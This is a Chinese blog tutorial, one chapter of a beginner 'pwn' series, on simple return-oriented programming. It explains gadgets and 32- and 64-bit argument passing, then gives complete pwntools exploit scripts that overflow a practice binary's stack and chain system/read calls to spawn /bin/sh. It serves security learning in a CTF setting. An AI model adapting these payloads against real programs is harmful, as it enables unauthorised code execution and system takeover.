Linux下pwn从入门到放弃,pwn从入门到放弃第六章——简单ROP

最新推荐文章于 2022-01-16 23:09:49 发布
最新推荐文章于 2022-01-16 23:09:49 发布
阅读量237 收藏
点赞数
文章标签: Linux下pwn从入门到放弃

66b52468c121889b900d4956032f1009.png

8种机械键盘轴体对比

本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?

这篇鸽了挺久的,补一下吧

简单介绍ROP

首先先来说下什么是ROP

ROP是Return Oriented Programming 的缩写

翻译过来就是面向返回的编程

你可能会问,我们不是利用栈溢出漏洞么,怎么又扯到编程了?

其实ROP就是另外一种意义上的编程,其核心在于利用了指令集中的 ret 指令,改变了指令流的执行顺序。ROP 攻击一般得满足如下条件程序存在溢出,并且可以控制返回地址。

可以找到满足条件的 gadgets 以及相应 gadgets 的地址。

这里的gadgets是类似下面的代码片段

964d9409126481878647f369d37ddbbb.png

这里用32位的程序作为示例,所以我们先讲32位的ROP,然后再讲64位的ROP,两者其实相差不大

这些gadgets一般遵循以下的形式1

2

3xxx

xxx

ret

例如1

2pop ebp

ret

1

2int 80h

ret

反正就是一堆指令后面跟着ret

但是比较常见和常用的就是1

2pop xxx

ret

这一类的gadget

但是其实在32位的ROP中是比较少用gadget的

这里又扯一下函数参数的传递方式32位

我们举一个例子吧,在上一章的示例程序中也可以找到对应的代码1read(0,buf,0x100)

这一句代码,对应的汇编是1

2

3

4

5.text:08048484 push 100h ; nbytes

.text:08048489 lea eax, [ebp+buf]

.text:0804848C push eax ; buf

.text:0804848D push 0 ; fd

.text:0804848F call _read

可以看到参数是从右到左入栈,先push 0x100,再push buf,最后push 0

所以例如1my_fun(0,1,2,3,4,5,6)

对应的汇编就是1

2

3

4

5

6

7

8push 6

push 5

push 4

push 3

push 2

push 1

push 0

call my_fun

64位

同样是那一行代码1read(0,buf,0x100)

对应的64位汇编是1

2

3

4

5lea rax, [rbp+buf]

mov edx, 100h ; nbytes

mov rsi, rax ; buf

mov edi, 0 ; fd

call _read

而1my_fun(0,1,2,3,4,5,6)

就变成1

2

3

4

5

6

7

8push 6

mov r9d, 5

mov r8d, 4

mov ecx, 3

mov edx, 2

mov esi, 1

mov edi, 0

call my_fun

可以看到函数的前6个参数都会放到寄存器里面,从左到右对应的是1rdi, rsi, rdx, rcx, r8d, r9d

如果还有更多参数的话,就会通过栈来传递

32位程序实战

接下来结合实例来讲一下吧

还是用上一章那个程序

假如现在我们不直接跳到backdoor函数,而是通过ROP来调用1system("/bin/sh")

布置好的栈如下

82d33a0509f27058fc35bfd318238b91.png

对应的payload是1

2

3

4

5

6

7

8

9

10

11

12

13

14

15from pwn import *

p=process('./pwn_level1')

context.log_level='debug'

gdb.attach(p)

p.recvuntil('try to stackoverflow!!')

system=0x8048340

binsh=0x8048577

p.send('a'*13+p32(system)+p32(0xdeadbeef)+p32(binsh))

p.interactive()

接下来讲解一下为什么这样布置栈

我们在0x8048499 处下一个断点

dbe5213a3179da327e49840a8c7ebc86.png

用1x /10xw $esp

查看栈的情况

615d20896c98da39f84bd7cda4ee80d2.png1

2

30x08048340 -> system

0xdeadbeef -> retaddr

0x08048577 -> /bin/sh字符串的地址

你可能想问,这里为什么突然多了retaddr这个东西了呢?

我们来回顾一下正常调用1system("/bin/sh")

对应的汇编是1

2push binsh_addr

call system

关键就在1call system

这句汇编其实等价于1

2push eip+5

jmp system

因为call指令一波都是5个字节的长度,所以这里保存的是下一条指令的地址

而我们栈溢出控制rip,其实就相等于1jmp system

少了保存地址,所以我们要填一个返回地址给它

但是调用system(“/bin/sh”)之后就get shell了,返回地址是什么其实没有什么所谓,所以填0xdeadbeef也行

接下来加大一点难度

假设程序里面没有/bin/sh这个字符串,我们要调用read读/bin/sh到bss段

布置好的栈如下

30d4b403cee033cdf6dd454079df86b7.png

payload如下1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24from pwn import *

p=process('./pwn_level1')

context.log_level='debug'

#gdb.attach(p)

p.recvuntil('try to stackoverflow!!')

read=0x8048320

system=0x8048340

binsh=0x8048577

pop3ret=0x8048539

bss=0x804A024

payload='a'*13+p32(read)+p32(pop3ret)+p32(0)+p32(bss)+p32(0x100)

payload+=p32(system)+p32(0xdeadbeef)+p32(bss)

p.send(payload)

sleep(1)

p.sendline('/bin/shx00')

p.interactive()

这里如果要调试的话,最好把1sleep(1)

换成1raw_input()

这样比较好调

这里1pop3ret

作用是改变栈,让栈指针指向system

64位程序实战

64位的其实和32位的大同小异,区别就在于传递参数那里

这里给下示例程序

然后给下payload,因为差不多,所以就不详细解释了1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17from pwn import *

p=process('./pwn_level1_64')

context.log_level='debug'

gdb.attach(p)

p.recvuntil('try to stackoverflow!!')

prdi=0x400663

binsh=0x400684

system=0x400480

payload='a'*9+p64(prdi)+p64(binsh)+p64(system)

p.send(payload)

p.interactive()

但是因为程序没有1pop rdx

这个gadget,所以在这个程序比较难控制第三个参数,也就比较难调用1read(0,buf,0x100)

比较难不代表不行,之后会介绍一个万能gadget,能够控制rdx的

weixin_39770506
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rop检查_CTF必备技能丨Linux Pwn入门教程——ROP技术
weixin_39724382的博客
12-04 238
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有注释的pyth...
Linuxpwn入门放弃
热门推荐
一个码农的笔记
12-15 1万+
0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: (1)gdb:Linux调试中必要用到的 (2)gdb-peda:gdb方便调试的工具,类似的工具有gef,gd
Linuxpwn入门放弃,Linuxpwn入门放弃
weixin_31817039的博客
05-14 312
Linuxpwn入门放弃0x0 简介pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处0x01 工欲善其事,必先利其器Linux下的pwn常用到的工具有:gdb:Linux调试中必要用到的pwntools:写exp和poc的利器checksec:可以很方便...
Linuxpwn入门放弃,[原创][分享]Pwn入门放弃(三)
weixin_39977642的博客
05-14 160
0x01 栈溢出利用0x02 基本的ROP利用0x03 题目三:该题目是plaidctf-2013的一道题,ropasaurusrex第一步:checksec看一下该程序开了哪些保护:程序为32位小端,保护只开启了NX保护,意味着堆栈不可执行。第二步:运行该程序看看:待你输入内容后,会给一些的反馈*第三步:gdb动态调试一下看看:可以看到,崩溃在140处,因此可以知道返回地址在144字节处。第四步...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
pwn入门题目汇总.rar
09-01
本压缩包“pwn入门题目汇总.rar”显然是为初学者准备的一系列练习,旨在帮助他们了解和掌握pwn的基本概念和技术。 在学习pwn的过程中,首先需要理解的是计算机内存的工作原理,特别是栈、堆和全局变量的布局。栈是...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
Linuxpwn入门放弃,pwn入门放弃第三章——gdb的基本使用教程
weixin_29338423的博客
05-14 1698
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?考完试了,来填坑gdb在做题中经常用到,熟练掌握gdb会事半功倍我们继续用第二章中的程序来讲解gdb的使用将程序直接拖进vmware中,因为我们下的vmware专用版本的kali,所以已经安装好vmware tool之类的,直接拖进去或者复制粘贴进去就可以了打开terminal,cd到Desktop先给程序加可执行权限,...
pwn --rop
Vccxx的博客
04-08 2032
rop练习—Very Secure Systemrop 真爽。。题目链接:http://pan.baidu.com/s/1eSd0XTg 注:.bak是原题,原题有个过10s自动退出程序的设置,不好调试,我用ida打了个patch,就是另一个文件,两个文件只有这一个区别漏洞分析:这个程序是静态加载的,所以got表没有用,顺带dynelf也不行,也没提供libc。但是有一个函数可以溢出,但是只溢出了
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5845
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串函
栈溢出学习
feng的博客
01-16 1897
前言 跟着ctfwiki学习,所有题目都在ctfwiki上可以找到。加油加油。 栈溢出原理 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。 看一个简单的程序: #include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); system("/bin/sh"); } void
ctf中pwn题目总结
weixin_41038905的博客
11-16 4714
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
Linux pwn入门教程,pwn入门系列教程1
weixin_29015899的博客
05-02 519
pwn入门系列教程1因为自己学堆的时候,找不到一个系统的教程,我将会按照ctf-wiki的目录一步步学下去,尽量做到每周有更新,方便跟我一样刚入门堆的人学习,第一篇教程研究了4天吧,途中没人指导。。很尴尬,自己一个很容易的点研究了很久才懂,把踩过的坑也总结下,方便后人不再踩坑学习链接环境搭建off by one原理(引用ctf-wiki)off-by-one 是指单字节缓冲区溢出,这种漏洞的产生...
对递归函数的一点小理解
LeviZhou的专栏
11-15 1553
对于递归函数,大家都很熟悉了,对于解析一些复杂数据结构方面,能够使代码非常简洁,明了。从我的理解来说,递归函数一般效率比较低,而且自身特点导致的限制也不少: 1. 效率低一个非常简单的例子数数吧,从1数到1M。对于循环实现的:void Counter() { int i=0; while( i 递归实现:void Counter(int i) { if( i >= 1M ) return; Counter( ++i ); } 对于循环实现,函数
debug调试技巧总结
天天开心
09-16 207
debug调试技巧总结 debug主要就是为了我们研究源码和修改bug用的。它可以帮助我们很好的看懂别人的代码。 f5:进入某个方法 f6:执行下一步 f7:执行完当前方法,再跳出当前方法 f8:执行到最后 如果不怎么懂的话,建议使用f5。因为f5的话如果没有方法可以进去的话。f5就等于f6。只不过步骤多一些而已。当然如果你比较熟悉的话。想不进入某个方法就直接使用f6。当有...
实验三--rop
qq_44759495的博客
03-20 630
实验原理与目的 在上次实验的基础上稍微加大点难度,倘若不能直接找到system和bin/sh,之前向内存中中直接写入shellcode的方式就行不通了,那么就需要一些其他手段来获得,所以就需要绕过保护。ROP(Return-Oriented Programming, 返回导向编程)就是一种绕过技术,本实验就是通过泄露某个在libc中的内容在内存中的实际地址,通过计算偏移量来得到system和bin...
Linux pwn零基础入门教程:环境配置到实战攻击
"i春秋月刊第六期的主题深入探讨了Linux pwn(Privilege Escalation,权限提升)的零基础入门教程。该系列由Tangerine@SAINTSEC作者撰写,历时三个月精心编撰,旨在解决新手在Linux环境下攻破安全挑战时遇到的难题,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值